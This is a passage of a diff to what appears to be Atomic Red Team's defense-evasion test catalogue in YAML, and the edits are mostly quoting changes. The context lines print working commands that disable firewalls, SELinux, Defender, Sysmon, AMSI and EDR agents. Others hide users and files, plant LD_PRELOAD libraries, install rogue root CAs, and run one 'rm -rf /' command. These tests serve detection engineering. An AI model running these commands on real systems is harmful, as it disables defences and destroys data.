"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f -' + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -22857,7 +22857,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 -' + ' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 
@@ -22916,27 +22916,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw disable -' + ' cleanup_command: | ufw enable ufw status verbose @@ -22950,7 +22950,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -22958,13 +22958,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'systemctl stop ufw -' + ' cleanup_command: | systemctl start ufw systemctl status ufw @@ -22977,20 +22977,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw logging off -' + ' cleanup_command: | ufw logging low ufw status verbose 
@@ -23004,14 +23004,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -23025,21 +23025,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -23048,7 +23048,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules -' + ' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -23059,14 +23059,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -23086,14 +23086,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true 
@@ -23113,14 +23113,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. -' + ' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -23129,7 +23129,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw -' + ' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -23140,20 +23140,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. -' + ' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log -' + ' cleanup_command: '' T1562.001: technique: @@ -23218,7 +23218,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection -' + ' supported_platforms: - linux input_arguments: @@ -23245,11 +23245,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -23260,7 +23260,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service -' + ' supported_platforms: - linux executor: 
@@ -23278,23 +23278,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement -' + ' supported_platforms: - linux executor: command: 'setenforce 0 -' + ' cleanup_command: 'setenforce 1 -' + ' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux -' + ' supported_platforms: - linux executor: @@ -23310,7 +23310,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response -' + ' supported_platforms: - macos executor: @@ -23326,48 +23326,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper -' + ' supported_platforms: - macos executor: command: 'sudo spctl --master-disable -' + ' cleanup_command: 'sudo spctl --master-enable -' + ' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS 
@@ -23375,7 +23375,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS -' + ' supported_platforms: - macos input_arguments: @@ -23413,40 +23413,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded -' + ' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed -' + ' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded -' + ' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} -' + ' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -23458,7 +23458,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion -' + ' supported_platforms: - windows input_arguments: @@ -23471,10 +23471,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available -' + ' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null 
@@ -23483,20 +23483,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed -' + ' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} -' + ' get_prereq_command: 'cmd /c sysmon -i -accepteula -' + ' executor: command: 'sysmon -u -' + ' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -23524,11 +23524,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse -' + ' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null -' + ' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -23602,11 +23602,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -' + ' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -' + ' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -23646,7 +23646,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -' + ' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -23656,7 +23656,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. -' + ' supported_platforms: - windows input_arguments: @@ -23677,7 +23677,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. -' + ' supported_platforms: - windows input_arguments: 
@@ -24316,21 +24316,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -24355,18 +24355,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -24466,10 +24466,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -24943,7 +24943,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory -' + ' supported_platforms: - linux - macos 
@@ -24955,14 +24955,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} -' + ' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it -' + ' supported_platforms: - linux - macos @@ -24974,14 +24974,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} -' + ' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it -' + ' supported_platforms: - linux input_arguments: @@ -24992,7 +24992,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} -' + ' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -25012,17 +25012,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} -' + ' executor: command: 'del /f #{file_to_delete} -' + ' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -25042,17 +25042,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'mkdir #{folder_to_delete} -' + ' executor: command: 'rmdir /s /q #{folder_to_delete} -' + ' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 
@@ -25060,7 +25060,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -25074,17 +25074,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null -' + ' executor: command: 'Remove-Item -path #{file_to_delete} -' + ' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 @@ -25092,7 +25092,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -25106,18 +25106,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null -' + ' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse -' + ' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -25125,13 +25125,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. -' + ' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null -' + ' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb 
@@ -25144,7 +25144,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) -' + ' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -25168,18 +25168,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) -' + ' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null -' + ' executor: command: 'Remove-Item #{teamviewer_log_file} -' + ' name: powershell T1222: technique: @@ -25324,7 +25324,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line -' + ' supported_platforms: - macos input_arguments: @@ -25335,7 +25335,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} -' + ' elevation_required: true name: sh T1484.001: @@ -25563,7 +25563,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory -' + ' supported_platforms: - linux - macos @@ -25573,20 +25573,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ -' + ' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS -' + ' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" -' + ' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 
@@ -25604,20 +25604,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +s #{file_to_modify} -' + ' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib @@ -25636,27 +25636,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +h #{file_to_modify} -' + ' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools -' + ' supported_platforms: - macos input_arguments: @@ -25667,13 +25667,13 @@ defense-evasion: executor: command: 'setfile -a V #(unknown) -' + ' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS -' + ' supported_platforms: - macos executor: @@ -25682,22 +25682,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt -' + ' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS -' + ' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES -' + ' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO -' + ' name: sh T1564.002: technique: 
@@ -25745,7 +25745,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) -' + ' supported_platforms: - macos input_arguments: @@ -25756,17 +25756,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin -' + ' supported_platforms: - macos input_arguments: @@ -25777,10 +25777,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh T1564.003: @@ -25862,7 +25862,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} -' + ' name: powershell T1564: technique: @@ -25946,7 +25946,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -25956,7 +25956,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -25966,7 +25966,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore -' + ' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -26141,7 +26141,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells -' + ' supported_platforms: - linux - macos 
@@ -26307,7 +26307,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files -' + ' supported_platforms: - linux input_arguments: @@ -26342,7 +26342,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. -' + ' supported_platforms: - linux input_arguments: @@ -26487,10 +26487,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: -' + ' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: -' + ' name: command_prompt elevation_required: true T1202: @@ -26604,7 +26604,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" -' + ' name: command_prompt T1553.004: technique: @@ -26704,7 +26704,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -26733,7 +26733,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -26749,10 +26749,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -26766,7 +26766,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl -' + ' supported_platforms: - macos input_arguments: 
@@ -26782,10 +26782,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -26793,14 +26793,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" -' + ' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell -' + ' supported_platforms: - windows input_arguments: @@ -26812,10 +26812,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -26839,7 +26839,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil -' + ' supported_platforms: - windows input_arguments: @@ -26851,10 +26851,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} 
@@ -26862,7 +26862,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} -' + ' cleanup_command: | $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore @@ -26949,10 +26949,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -27017,10 +27017,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -27063,7 +27063,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: 
@@ -27088,10 +27088,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -27134,7 +27134,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -27159,10 +27159,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -27205,7 +27205,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -27230,10 +27230,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
